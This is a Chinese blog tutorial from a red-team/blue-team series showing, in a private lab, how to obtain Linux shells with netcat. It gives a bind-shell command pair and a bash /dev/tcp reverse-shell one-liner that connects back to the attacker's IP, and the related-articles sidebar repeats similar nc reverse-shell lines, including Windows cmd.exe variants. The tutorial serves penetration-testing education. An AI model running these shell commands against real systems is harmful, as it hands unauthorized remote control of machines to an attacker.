《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell

已于 2023-10-24 21:04:47 修改
阅读量2.1w 收藏 5
点赞数
分类专栏: 红蓝攻防对抗实战指南 文章标签: 1024程序员节 隧道穿透 Linux反弹shell bash shell反弹
于 2023-10-24 21:03:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46192679/article/details/134021383
版权

目录

一.利用NC工具在linux执行反弹shell

1.Linux正向连接shell

2.利用Linux自带bash反弹Shell

 前文推荐:

一.利用NC工具在linux执行反弹shell

图1-1  Linux系统下实验拓扑图

1.Linux正向连接shell

  假设在linux操作系统中想要获取反弹shell,其中反弹方式和上述演示的Windows操作系统不同,以两台linux服务器为例进行实验,实验环境如图1-1 所示,使用正向连接shell的方式。

1)在目标服务器执行nc -lvp 8888 -e /bin/bash 命令来开启目标服务器的监听,如图1-2所示,当有应用程序访问到目标服务器的8888端口的程序时会将bash带出。

图1-2  目标服务器开启监听

2)开启目标服务器的监听后,在攻击机执行nc 192.168.0.3 8888命令来连接目标服务器,此时会获得到目标服务器反弹出来的shell,使用ifconfig命令来验证是否是目标服务器的IP地址,执行结果如图1-3所示。

图1-3  攻击机连接获取反弹shell

2.利用Linux自带bash反弹Shell

1)首先在攻击机中使用nc执行nc -lvp 8888命令开启监听,执行结果如图1-4所示。

图1-4 攻击机开启监听

2)在目标服务器中执行bash -c "bash -i >& /dev/tcp/192.168.0.2/8888 0>&1命令来将shell反弹到攻击机上,其中192.168.0.2是攻击机的IP地址,8888是所监听的端口,如图1-5所示。

图1-5 目标服务器发起连接

3)此时在攻击机中,可以看到已经成功接收到目标服务器反弹的shell,如图1-6所示。

图1-6 攻击机获取反弹shell

一只特立独行的兔先森
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【愚公系列】2023年06月 网络安全高级班 025.HW护网行动攻防演练介绍和工具
时光隧道
05-12 9662
HW护网行动攻防演练是一种针对网络安全的实践活动,用于测试和提高组织的网络安全防御和攻击能力。通过模拟真实的网络攻击和防御行动,演练参与者在紧张压力下的反应和解决问题的能力,发现网络安全漏洞和提高安全意识,加强网络安全防御能力。攻防演练的成员组成一般包括攻击者、防御者和观察者三个角色。攻击者的任务是模拟真实的黑客攻击,找出系统的漏洞并利用其进行攻击,以检验系统的安全性。防御者则负责发现和修补漏洞,并保护系统不受攻击。观察者则负责记录和分析整个攻防过程,并提供建议和改进意见。
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
NC反弹Shell
qq_23066945的博客
11-23 649
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1657
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
反弹shell的本质及实战
静水流深,沧笙踏歌
05-13 405
Linux反弹shell(一)文件描述符与重定向 Linux 反弹shell(二)反弹shell的本质 Linux反弹shell几种方法学习总结
利用nc反弹shell
D1stiny的博客
05-18 489
正向shell:攻击机主动连接靶机 攻击机主动连接并得到反弹shell nc 靶机ip 53##因为防火墙的原因,通常不会成功 服务端监听连接 nc -lp 53 -e /bin/sh ##-lp就是-l,-p写在一起 nc -lp 53 -e c:\windows\system32\cmd.exe ##windows 反向shell:靶机连接攻击机(靶机运行了攻击机制作的后门程序) 攻击机监听 nc -lp 53 ##通常选用80,53等常用端口,防止连接失败 靶机连接攻击机 nc 攻击机ip
红蓝攻防对抗实战》六.常规反弹利用NC在windows系统执行反弹shell
热门推荐
一只特立独行的兔先森
10-23 2万+
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作
红蓝对抗Linux内网渗透
Tencent_SRC的博客
12-11 7086
文|腾讯蓝军 jumbo前言上篇内网渗透(附录1)主要讲的是Windows这块,最近知识星球“腾讯安平密友圈”提到了一个问题“为什么内网渗透偏向于Windows”,笔者也在下面进行了相关...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
最新发布
HACKONE的博客
04-10 263
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1671
内网渗透-Linux内网渗透
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
LinuxNC反弹shell命令(推荐)
09-15
主要介绍了LinuxNC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
反弹shell的方法和场景
weixin_45653478的博客
04-01 1523
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
NC反弹shell的几种方法
qq_59350385的博客
05-12 9783
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
反弹shell初识
无痕的博客
11-01 4115
反弹shell的指令与演示
红蓝对抗常态化 支付宝技术风险防控机制首次曝光
weixin_33896726的博客
12-19 236
小蚂蚁说:支付宝红蓝CP又开始日常“互怼”啦!为了迎接年度技术“期末考试”周,技术蓝军每周都会组织突袭攻击“测验”,通过实战中发掘出来的脆弱点牵引红军进行能力升级。而红军的防控体系建设也在如火如荼地进行着,实时核对平台能够做到稳定的分钟级核对异常发现能力,还能提供业务快速接入的能力。 为提升全面风险意识,持续提升业务及技术架构的风险应对...
内网渗透:nc反弹shell总结
安全大白
01-03 6518
1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows 3、若
从网络安全热门岗位看红蓝对抗发展趋势
Moyun_vackbot的博客
03-15 8809
目前网络安全行业哪些岗位最热门?以下为SANS发布的2021年网络安全领域最酷的20个岗位: SANS:网络安全领域最酷的20个岗位 从岗位名称及职责描述中我们可以看到,除了安全技术总监、渗透测试、漏洞研究、应急响应等传统热门岗位之外,与红蓝对抗相关的岗位受到了广泛重视: 02 红队(Red Teamer) 04 紫队(Purple Teamer) 07 蓝队(Blue Teamer) 11 OSINT调查员/分析员(OSINTInvestigator / .
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2884
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值